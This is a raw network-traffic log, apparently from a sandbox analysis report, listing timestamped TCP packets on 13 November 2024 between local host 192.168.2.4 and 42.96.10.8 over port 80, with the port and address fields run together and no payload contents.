                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092386007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092389107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092408895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092423916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092438936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092447042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092447042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092468023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092538118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092554092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092581034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092597008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092612982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092627048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092642069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092667103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092667103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092674971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092758894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092772961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092848063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092856884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092856884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092865944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092884064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092910051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092926025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092940092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092948914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092973948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092983007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.092999935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093014956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093029976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093082905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093147039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093163013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093184948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093187094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093187094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093202114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093225956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093266964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093281031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093296051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093306065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093322039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093338013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093338013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093355894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093373060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093431950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093456984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093523979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093581915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093599081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093624115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093624115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093624115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093625069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093641996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093660116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093713045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093728065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093739986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093739986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093744040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093792915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093808889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093823910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093847990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093847990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093848944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093868017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093877077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093884945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093903065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093918085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093926907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.093934059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.094165087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.094166040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132648945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132666111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132682085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132697105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132721901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132736921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132747889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132747889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132752895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132770061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132787943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132802963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132818937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132833004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132849932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132849932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132849932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132858992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132877111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132956982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132973909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132977962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132977962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.132991076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.133007050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.133023024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.133037090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.133455992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.133455992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.134170055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.164443016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.164459944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.164475918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.164541006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.164556026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.164571047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.164586067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.164599895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.164621115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.164622068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.164622068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.166259050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.172847986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.172889948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.172904015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.173015118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.173029900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.173043013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.173044920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.173060894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.173455954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.173455954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.174226046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.174241066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.174257040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.174276114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.174290895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.174304962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.174328089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.174328089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.174328089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.174380064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.174396038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.174411058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.175358057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.193551064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.193564892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.193579912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.193594933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.193614006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.195355892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196382999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196408987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196422100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196446896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196460962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196506023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196517944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196542978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196542978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196542978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196573973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196588039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196604013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196665049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196679115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196693897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196729898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196760893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196760893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196784019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196801901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196857929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196875095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196890116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196897984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196906090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.196913958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197021961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197037935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197052956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197067976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197067976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197067976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197067976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197083950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197099924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197103024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197143078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197166920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197181940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197199106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197215080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197228909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197247028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197248936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197248936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197248936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197271109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197274923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197285891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197302103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197316885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197319984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197333097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197360039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197416067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197432041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197448015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197463036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197478056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197478056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197479010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197494030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197535992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197554111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197567940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197570086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197570086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197583914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197599888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197603941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197614908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197634935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197668076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197668076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197676897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197694063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197726965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197792053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197808027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197824955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197840929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197855949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197855949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197856903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197871923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197889090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197904110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197920084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197932005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197942019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197942019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197942019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197947979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.197988033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198004961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198018074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198034048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198046923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198061943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198061943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198061943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198105097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198117971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198132992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198147058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198185921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198185921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198187113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198199987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198215008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198230982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198246002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198235989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198262930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198322058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198322058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198322058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198333979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198365927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198381901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198396921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198411942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198427916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198441982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198446035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198446035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198509932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198529005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198546886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198563099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198576927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198591948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198592901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198606014 CET804973342.96.10.8192.168.2.4
